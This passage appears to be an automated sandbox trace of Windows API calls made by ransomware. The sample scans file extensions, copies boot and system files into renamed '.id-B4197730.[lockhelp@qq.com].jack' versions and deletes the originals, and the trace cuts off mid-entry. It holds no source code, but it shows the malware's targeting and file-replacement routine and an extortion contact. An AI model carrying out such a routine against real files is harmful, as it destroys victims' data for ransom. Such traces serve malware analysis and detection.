[0198.836] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0198.837] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.837] lstrlenW (lpString=".1cd") returned 4 [0198.837] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0198.837] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0198.837] lstrlenW (lpString=".jpg") returned 4 [0198.837] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0198.837] lstrcmpiW (lpString1=".DAT", lpString2=".jack") returned -1 [0198.837] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0198.837] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.838] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=65536) returned 1 [0198.838] CloseHandle (hObject=0x3b8) returned 1 [0198.838] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0198.838] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.838] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0198.838] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.838] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.838] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.838] GetLastError () returned 0x0 [0198.839] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x10000, lpOverlapped=0x0) returned 1 [0198.841] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x10010, lpOverlapped=0x0) returned 1 [0198.842] ReadFile (in: hFile=0x3b8, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.842] WriteFile (in: hFile=0x404, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.843] SetEndOfFile (hFile=0x404) returned 1 [0198.843] CloseHandle (hObject=0x404) returned 1 [0198.844] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.844] SetEndOfFile (hFile=0x3b8) returned 1 [0198.846] CloseHandle (hObject=0x3b8) returned 1 [0198.846] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0198.846] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0198.846] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.846] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.846] lstrlenW (lpString=".doc") returned 4 [0198.846] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0198.846] lstrlenW (lpString=".docx") returned 5 [0198.846] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0198.846] lstrlenW (lpString=".pdf") returned 4 [0198.846] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0198.846] lstrlenW (lpString=".xls") returned 4 [0198.846] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0198.846] lstrlenW (lpString=".xlsx") returned 5 [0198.847] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0198.847] lstrlenW (lpString=".ppt") returned 4 [0198.847] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString=".zip") returned 4 [0198.847] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString=".rar") returned 4 [0198.847] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString=".bz2") returned 4 [0198.847] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0198.847] lstrlenW (lpString=".7z") returned 3 [0198.847] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString=".dbf") returned 4 [0198.847] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString=".1cd") returned 4 [0198.847] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString=".jpg") returned 4 [0198.847] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.847] lstrlenW (lpString=".doc") returned 4 [0198.847] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString=".docx") returned 5 [0198.847] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0198.847] lstrlenW (lpString=".pdf") returned 4 [0198.847] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString=".xls") returned 4 [0198.847] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0198.847] lstrlenW (lpString=".xlsx") returned 5 [0198.848] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0198.848] lstrlenW (lpString=".ppt") returned 4 [0198.848] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0198.848] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.848] lstrlenW (lpString=".zip") returned 4 [0198.848] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0198.848] lstrlenW (lpString=".rar") returned 4 [0198.848] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0198.848] lstrlenW (lpString=".bz2") returned 4 [0198.848] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0198.848] lstrlenW (lpString=".7z") returned 3 [0198.848] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0198.848] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.848] lstrlenW (lpString=".dbf") returned 4 [0198.848] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0198.848] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.848] lstrlenW (lpString=".1cd") returned 4 [0198.848] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0198.848] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0198.848] lstrlenW (lpString=".jpg") returned 4 [0198.848] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0198.848] lstrcmpiW (lpString1=".p7b", lpString2=".jack") returned 1 [0198.848] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0198.848] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.080] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=4662) returned 1 [0199.080] CloseHandle (hObject=0x430) returned 1 [0199.080] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0199.080] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.080] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.080] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.080] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.080] lstrlenW (lpString=".doc") returned 4 [0199.080] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0199.080] lstrlenW (lpString=".docx") returned 5 [0199.080] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0199.080] lstrlenW (lpString=".pdf") returned 4 [0199.080] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0199.080] lstrlenW (lpString=".xls") returned 4 [0199.080] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0199.080] lstrlenW (lpString=".xlsx") returned 5 [0199.080] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0199.080] lstrlenW (lpString=".ppt") returned 4 [0199.081] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString=".zip") returned 4 [0199.081] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0199.081] lstrlenW (lpString=".rar") returned 4 [0199.081] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0199.081] lstrlenW (lpString=".bz2") returned 4 [0199.081] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0199.081] lstrlenW (lpString=".7z") returned 3 [0199.081] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString=".dbf") returned 4 [0199.081] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString=".1cd") returned 4 [0199.081] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString=".jpg") returned 4 [0199.081] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.081] lstrlenW (lpString=".doc") returned 4 [0199.081] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0199.081] lstrlenW (lpString=".docx") returned 5 [0199.081] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0199.081] lstrlenW (lpString=".pdf") returned 4 [0199.081] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0199.081] lstrlenW (lpString=".xls") returned 4 [0199.081] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0199.082] lstrlenW (lpString=".xlsx") returned 5 [0199.082] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0199.082] lstrlenW (lpString=".ppt") returned 4 [0199.082] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0199.082] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.082] lstrlenW (lpString=".zip") returned 4 [0199.082] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0199.082] lstrlenW (lpString=".rar") returned 4 [0199.082] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0199.082] lstrlenW (lpString=".bz2") returned 4 [0199.082] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0199.082] lstrlenW (lpString=".7z") returned 3 [0199.082] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0199.082] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.082] lstrlenW (lpString=".dbf") returned 4 [0199.082] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0199.082] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.082] lstrlenW (lpString=".1cd") returned 4 [0199.082] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0199.082] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0199.082] lstrlenW (lpString=".jpg") returned 4 [0199.082] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0199.082] lstrcmpiW (lpString1=".BAK", lpString2=".jack") returned -1 [0199.082] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0199.083] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.083] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=8192) returned 1 [0199.083] CloseHandle (hObject=0x430) returned 1 [0199.083] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0199.083] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\bootsect.bak.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.083] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0199.097] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.097] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.097] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.098] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\bootsect.bak.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0199.109] GetLastError () returned 0x0 [0199.109] ReadFile (in: hFile=0x430, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2000, lpOverlapped=0x0) returned 1 [0199.197] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2010, lpOverlapped=0x0) returned 1 [0199.198] ReadFile (in: hFile=0x430, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.198] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.198] SetEndOfFile (hFile=0x3ec) returned 1 [0199.198] CloseHandle (hObject=0x3ec) returned 1 [0199.199] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.199] SetEndOfFile (hFile=0x430) returned 1 [0199.200] CloseHandle (hObject=0x430) returned 1 [0199.200] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x27) returned 1 [0199.201] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0199.201] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.201] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.201] lstrlenW (lpString=".doc") returned 4 [0199.201] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0199.201] lstrlenW (lpString=".docx") returned 5 [0199.201] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0199.201] lstrlenW (lpString=".pdf") returned 4 [0199.202] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString=".xls") returned 4 [0199.202] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString=".xlsx") returned 5 [0199.202] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0199.202] lstrlenW (lpString=".ppt") returned 4 [0199.202] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString=".zip") returned 4 [0199.202] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString=".rar") returned 4 [0199.202] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString=".bz2") returned 4 [0199.202] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString=".7z") returned 3 [0199.202] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString=".dbf") returned 4 [0199.202] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString=".1cd") returned 4 [0199.202] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString=".jpg") returned 4 [0199.202] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.202] lstrlenW (lpString=".doc") returned 4 [0199.203] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".docx") returned 5 [0199.203] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0199.203] lstrlenW (lpString=".pdf") returned 4 [0199.203] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".xls") returned 4 [0199.203] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".xlsx") returned 5 [0199.203] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0199.203] lstrlenW (lpString=".ppt") returned 4 [0199.203] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.203] lstrlenW (lpString=".zip") returned 4 [0199.203] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".rar") returned 4 [0199.203] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".bz2") returned 4 [0199.203] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString=".7z") returned 3 [0199.203] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0199.203] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.203] lstrlenW (lpString=".dbf") returned 4 [0199.203] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0199.203] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.203] lstrlenW (lpString=".1cd") returned 4 [0199.203] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0199.203] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0199.203] lstrlenW (lpString=".jpg") returned 4 [0199.204] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0199.204] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.204] lstrlenW (lpString="Alphabet.xml") returned 12 [0199.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0199.218] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=791421) returned 1 [0199.218] CloseHandle (hObject=0x3ec) returned 1 [0199.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0199.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.218] lstrlenW (lpString=".doc") returned 4 [0199.218] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.218] lstrlenW (lpString=".docx") returned 5 [0199.218] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0199.218] lstrlenW (lpString=".pdf") returned 4 [0199.218] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString=".xls") returned 4 [0199.219] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString=".xlsx") returned 5 [0199.219] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0199.219] lstrlenW (lpString=".ppt") returned 4 [0199.219] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.219] lstrlenW (lpString=".zip") returned 4 [0199.219] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.219] lstrlenW (lpString=".rar") returned 4 [0199.219] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString=".bz2") returned 4 [0199.219] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString=".7z") returned 3 [0199.219] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.219] lstrlenW (lpString=".dbf") returned 4 [0199.219] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.219] lstrlenW (lpString=".1cd") returned 4 [0199.219] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.219] lstrlenW (lpString=".jpg") returned 4 [0199.219] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.220] lstrlenW (lpString=".doc") returned 4 [0199.220] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString=".docx") returned 5 [0199.220] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0199.220] lstrlenW (lpString=".pdf") returned 4 [0199.220] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString=".xls") returned 4 [0199.220] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString=".xlsx") returned 5 [0199.220] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0199.220] lstrlenW (lpString=".ppt") returned 4 [0199.220] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.220] lstrlenW (lpString=".zip") returned 4 [0199.220] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.220] lstrlenW (lpString=".rar") returned 4 [0199.220] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString=".bz2") returned 4 [0199.220] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.220] lstrlenW (lpString=".7z") returned 3 [0199.220] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.221] lstrlenW (lpString=".dbf") returned 4 [0199.221] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.221] lstrlenW (lpString=".1cd") returned 4 [0199.221] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0199.221] lstrlenW (lpString=".jpg") returned 4 [0199.221] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.221] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.221] lstrlenW 